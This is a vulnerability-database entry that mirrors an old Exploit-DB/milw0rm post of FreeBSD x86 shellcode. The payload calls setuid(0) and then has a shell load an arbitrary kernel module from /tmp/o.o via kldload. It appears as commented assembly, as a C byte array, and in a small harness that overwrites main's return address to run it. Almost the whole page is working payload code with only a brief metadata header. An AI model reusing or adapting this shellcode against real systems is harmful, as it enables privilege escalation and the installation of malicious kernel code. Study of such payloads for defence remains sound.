FreeBSD/x86 – Load Kernel Module (/sbin/kldload /tmp/o.o) Shellcode (74 bytes)

Vulnerability ID 1054675 Vulnerability type
Published 2004-09-26 Updated 2004-09-26
CVE ID N/A
CNNVD-ID N/A
Platform FreeBSD_x86 CVSS score N/A
|Source
https://www.exploit-db.com/exploits/13275
|Vulnerability details
Vulnerability details have not been disclosed.
|Exploit
/* The kldload shellcode
   setuid(0)
   loads /tmp/o.o kernel module

   Size	74 bytes
   OS   FreeBSD
		/rootteam/dev0id 	(www.sysworld.net)
			[email protected]

BITS	32
jmp	short	callme
main:
	pop	esi
	xor	eax,eax
	mov	al,0x17
	push	eax
	int	0x80
	xor	eax,eax
	push	eax
	push long	0x68732f6e
	push long	0x69622f2f
	mov	ebx,esp
	push	eax
	push word	0x632d
	mov	edi,esp
	push	eax
	push	esi
	push	edi
	push	ebx
	mov	edi,esp
	push	eax
	push	edi
	push	ebx
	push	eax
	mov	al,0x3b
	int	0x80
callme:
	call	main
	db	'/sbin/kldload /tmp/o.o'
*/

char shellcode[] =
	"\xeb\x2c\x5e\x31\xc0\xb0\x17\x50\xcd\x80\x31\xc0\x50\x68\x6e"
	"\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x66\x68\x2d\x63"
	"\x89\xe7\x50\x56\x57\x53\x89\xe7\x50\x57\x53\x50\xb0\x3b\xcd"
	"\x80\xe8\xcf\xff\xff\xff\x2f\x73\x62\x69\x6e\x2f\x6b\x6c\x64"
	"\x6c\x6f\x61\x64\x20\x2f\x74\x6d\x70\x2f\x6f\x2e\x6f";

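int
main(void)
{
	int *ret;
	/* Point at the saved return address in main's stack frame. */
	ret = (int *)&ret + 2;
	/* Overwrite it with the address of the shellcode buffer. */
	(*ret) = (int)shellcode;
}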

// milw0rm.com [2004-09-26]
